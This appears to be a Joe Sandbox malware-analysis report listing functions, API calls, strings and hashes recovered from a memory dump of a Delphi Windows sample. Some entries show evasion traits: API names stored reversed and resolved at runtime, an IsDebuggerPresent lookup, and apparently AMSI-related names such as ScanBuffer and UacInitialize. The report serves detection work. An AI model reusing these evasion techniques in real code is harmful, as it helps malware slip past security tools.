API ID: Read$HandleModule
String ID: KernelBase$LoadLibraryExA
API String ID: 2226866862-113032527
Opcode ID: ca1fb2cd571423cc2eb2c176b15433eddfa9c5593db0a2289458904e13997d3b
Instruction ID: 2faddc9b46a8df2df9eb2a9c23cd56d7f685c8f3ba8683e07fda3a656218678a
Opcode Fuzzy Hash: ca1fb2cd571423cc2eb2c176b15433eddfa9c5593db0a2289458904e13997d3b
Instruction Fuzzy Hash: 01314FB2A40705BBDF20DF68DC85F9A77ACEF05364F1045A4FA58EB280D770A950CBA4

Function 02B8432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B843F3,?,?,02BE07C8,?,?,02BAD7A8,02B8655D,02BAC30D), ref: 02B84365
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B843F3,?,?,02BE07C8,?,?,02BAD7A8,02B8655D,02BAC30D), ref: 02B8436B
GetStdHandle.KERNEL32(000000F5,02B843B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B843F3,?,?,02BE07C8), ref: 02B84380
WriteFile.KERNEL32(00000000,000000F5,02B843B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B843F3,?,?), ref: 02B84386
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02B843A4

Strings

Error, xrefs: 02B84398
Runtime error at 00000000, xrefs: 02B8435E, 02B8439D

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 7151a556e8287c482eefed0fdd0200f8faef3f0bb8349286e844497f575f66b4
Instruction ID: c4b095727fee88f413ee093a6f8cc27ca9565a40b4b4b3c70ea8e5bb2a31ce63
Opcode Fuzzy Hash: 7151a556e8287c482eefed0fdd0200f8faef3f0bb8349286e844497f575f66b4
Instruction Fuzzy Hash: 8EF02470AD6302B9FB10B664AC16FA9332C8700F54F508AD4B23CA90D0D7A090C5CB26

Function 02B8AE4C Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 02B8ACC4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B8ACE1
Part of subcall function 02B8ACC4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B8AD05
Part of subcall function 02B8ACC4: GetModuleFileNameA.KERNEL32(02B80000,?,00000105), ref: 02B8AD20
Part of subcall function 02B8ACC4: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B8ADB6

CharToOemA.USER32(?,?), ref: 02B8AE83
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02B8AEA0
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B8AEA6
GetStdHandle.KERNEL32(000000F4,02B8AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B8AEBB
WriteFile.KERNEL32(00000000,000000F4,02B8AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B8AEC1
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02B8AEE3
MessageBoxA.USER32(00000000,?,?,00002010), ref: 02B8AEF9

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: c82d30bce22976e294cee82e6a78cb1d9155dfa4e1a66fd4e1114cac8f7cc825
Instruction ID: 0f745b5eed8af571ed9bc69d3115d836435d580107718c0f5a7e82c8a9a92695
Opcode Fuzzy Hash: c82d30bce22976e294cee82e6a78cb1d9155dfa4e1a66fd4e1114cac8f7cc825
Instruction Fuzzy Hash: D4117CB6584244BAD200FBA4CC81FDB7BEDAB45700F4009A6B748DB0E0EA74E944CF62

Function 02B8E514 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B8E5AD
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B8E5C9
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02B8E602
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B8E67F
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02B8E698
VariantCopy.OLEAUT32(?,00000000), ref: 02B8E6CD

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: f59486620b0a623526fe5d36b74fdb37e94f2ff98b0fb904cdc1ff630e0f3710
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: B151B7759006299BCB26EB68C880BD9B3BDAF4D310F4441D6E50DA7252D630EF85CF61

Function 02B83568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B8358A
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B835D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B835BD
RegCloseKey.ADVAPI32(?,02B835E0,00000000,?,00000004,00000000,02B835D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B835D3

Strings

FPUMaskValue, xrefs: 02B835B4
SOFTWARE\Borland\Delphi\RTL, xrefs: 02B83580

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: e3fc2b7c5d7656280f428c1df30e8eecfd4e3e76b72d5c25e92f183de5152bb8
Instruction ID: 190acc5e9fee44fa69fdcc95c65f4ed835178289655a51984ba65afd81c76963
Opcode Fuzzy Hash: e3fc2b7c5d7656280f428c1df30e8eecfd4e3e76b72d5c25e92f183de5152bb8
Instruction Fuzzy Hash: 0B01D875954308BAF711EF94CD03BBDB7ECE708B10F1005E1BA08D7990E6749611CB59

Function 02B980C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
GetProcAddress.KERNEL32(?,?), ref: 02B9812D

Strings

sserddAcorPteG, xrefs: 02B980E3
Kernel32, xrefs: 02B98110

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: Kernel32$sserddAcorPteG
API String ID: 667068680-1372893251
Opcode ID: f79e5afb4bfdc242174ea7ac60c4f2ec830e9226a633e9e378820ee9156b0b47
Instruction ID: af86d6966c1a6d325e1fe9ca05e6ffb44cecfc31540bcc4d4edde7ba96c8444c
Opcode Fuzzy Hash: f79e5afb4bfdc242174ea7ac60c4f2ec830e9226a633e9e378820ee9156b0b47
Instruction Fuzzy Hash: 4C012C79A50304BFEF00EBA8D841A9E77BEEB49710F5188A4F50897A10DA34A910CE24

Function 02B8A9D8 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02B8AA6F,?,?,00000000), ref: 02B8A9F0

Part of subcall function 02B8A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B8A76A

GetThreadLocale.KERNEL32(00000000,00000004,00000000,02B8AA6F,?,?,00000000), ref: 02B8AA20
EnumCalendarInfoA.KERNEL32(Function_0000A924,00000000,00000000,00000004), ref: 02B8AA2B
GetThreadLocale.KERNEL32(00000000,00000003,00000000,02B8AA6F,?,?,00000000), ref: 02B8AA49
EnumCalendarInfoA.KERNEL32(Function_0000A960,00000000,00000000,00000003), ref: 02B8AA54

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 9a075c9aaf5666457ae9038b37bdb6e8e721cf87b331d94bbb385cc5bc430adc
Instruction ID: 4db1739fb723edf74cc4dd9345b1fa43a8b376d42c9425a4a0a9ce344990dceb
Opcode Fuzzy Hash: 9a075c9aaf5666457ae9038b37bdb6e8e721cf87b331d94bbb385cc5bc430adc
Instruction Fuzzy Hash: 85012B356006486FF701F674CD12B9E739DDB41B14F5105E1F62DAAAD0D674DE00CAA4

Function 02B8AA88 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02B8AC58,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02B8AAB7

Part of subcall function 02B8A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B8A76A

Strings

ggg, xrefs: 02B8AB9D
yyyy, xrefs: 02B8ABAD
eeee, xrefs: 02B8ABC6

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 2063db90a3a644ac7a7f405a0ee1d72694a40f4fce0820541a1b75fa9bb2aed1
Instruction ID: e15a8b52813a1d1561470f60d0b4639c0caab73c993c016c1ba367efa8ba5c1e
Opcode Fuzzy Hash: 2063db90a3a644ac7a7f405a0ee1d72694a40f4fce0820541a1b75fa9bb2aed1
Instruction Fuzzy Hash: B541F1753041064BD712BB698C902BEB3FBEB81204F5449E7E67EC7344EA38E906CE21

Function 02B98020 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E

Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D

GetModuleHandleA.KERNELBASE(?), ref: 02B98072

Strings

KernelBASE, xrefs: 02B98059
AeldnaHeludoMteG, xrefs: 02B98039

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1883125708-1952140341
Opcode ID: b7443c4ef544cacd868449d880d3ecc8a67ab2b2fa4bdcd95122d33efd72319e
Instruction ID: a599b593a3718ec0285e2559cfe5608e5b5ccb2d50b7e1175ffcdfe2f3a0f5c5
Opcode Fuzzy Hash: b7443c4ef544cacd868449d880d3ecc8a67ab2b2fa4bdcd95122d33efd72319e
Instruction Fuzzy Hash: B6F04971650304BFEF00EBA8D802A5E77AAEB4A740BA189F0F50897A10DA30AD10CA64

Function 02B9EB94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,?,02B9EF98,UacInitialize,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,Initialize), ref: 02B9EB9A
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B9EBAC

Strings

IsDebuggerPresent, xrefs: 02B9EBA6
KernelBase, xrefs: 02B9EB95

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsDebuggerPresent$KernelBase
API String ID: 1646373207-2367923768
Opcode ID: 0599b24204b04d17eac865f3a8fdaed0129b57bbc49a27c04d8a9b5b8ff2e440
Instruction ID: c53f71deb4cd9cdc3d453f49dbe707813cf432df9d6911bbdf4a33748a3ba3b4
Opcode Fuzzy Hash: 0599b24204b04d17eac865f3a8fdaed0129b57bbc49a27c04d8a9b5b8ff2e440
Instruction Fuzzy Hash: F5D012B27557901EBE00BAF80CC4C5E03CD8B0562AB240EF2F02BD60E2E6AAC8529520

Function 02B8C3FC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,02BAC10B,00000000,02BAC11E), ref: 02B8C402
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02B8C413

Strings

GetDiskFreeSpaceExA, xrefs: 02B8C40D
kernel32.dll, xrefs: 02B8C3FD

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 5446c4d82e08ba693b0dcbd544fc2e586c82b71f2d6aaa1f3283db5bab93140d
Instruction ID: 30d5f4e4c7826c761ad5e143cbaae48e58a9f8eca252cb83d477fd94b7e396ef
Opcode Fuzzy Hash: 5446c4d82e08ba693b0dcbd544fc2e586c82b71f2d6aaa1f3283db5bab93140d
Instruction Fuzzy Hash: B1D05EE0A413434EE3047AB16882A323B888704748F4C68E6A01D46102C7718490CFA4

Function 02B8E170 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B8E21F
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B8E23B
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B8E2B2
VariantClear.OLEAUT32(?), ref: 02B8E2DB

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: e164d1e99a325540b15e50a628cddb64a20d26c671c6ee6d7e0287f7c442ac9d
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: 2C41E775A0062A9BCB61EF68CC90BD9B3BDAF49614F4042D6E64CA7251DA30EF80CF51

Function 02B8ACC4 Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B8ACE1
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B8AD05
GetModuleFileNameA.KERNEL32(02B80000,?,00000105), ref: 02B8AD20
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B8ADB6

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: f3a5b4e281a5385a5d422858d575297f5170b854b631361198c346ce602277d7
Instruction ID: 020d07a2367a52c669e6449164ada2ba124696ac4a3ed9fb31f1c5f40dee9df3
Opcode Fuzzy Hash: f3a5b4e281a5385a5d422858d575297f5170b854b631361198c346ce602277d7
Instruction Fuzzy Hash: DA411A71A402589BDB61EB68CC84BDAB7FDAB18301F4444E6A64CE7251EB749F84CF50

Function 02B8ACC2 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B8ACE1
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B8AD05
GetModuleFileNameA.KERNEL32(02B80000,?,00000105), ref: 02B8AD20
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B8ADB6

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: a90c939674047f4835d28c0887c519078ad7e3ceabcd1f77cb4434a912a6d82c
Instruction ID: c11526136f2661489bc28ee0db205843ce0011f901268799c4cfeae0d4b59900
Opcode Fuzzy Hash: a90c939674047f4835d28c0887c519078ad7e3ceabcd1f77cb4434a912a6d82c
Instruction Fuzzy Hash: 2B413C71A402589BDB61FB68CC84BDAB7FDAB18301F4444E6A64CE7251EB749F84CF50

Function 02B81C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca61b3061c19b8e66e8fc742f8e1e044f7b2720c6770b6cc8dbd9f2fbdd5cff1
Instruction ID: e7e8d43b6d87b14230742a0b747fface9432644492f52e218fd486c63ae28868
Opcode Fuzzy Hash: ca61b3061c19b8e66e8fc742f8e1e044f7b2720c6770b6cc8dbd9f2fbdd5cff1
Instruction Fuzzy Hash: 76A1A4A67326014BE718BA7C9D943ADB3C6DB84265F1C42BEE21DCB281EB64C953C750

Function 02B89474 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02B89562), ref: 02B894FA
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02B89562), ref: 02B89500

Strings

yyyy, xrefs: 02B894D5

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

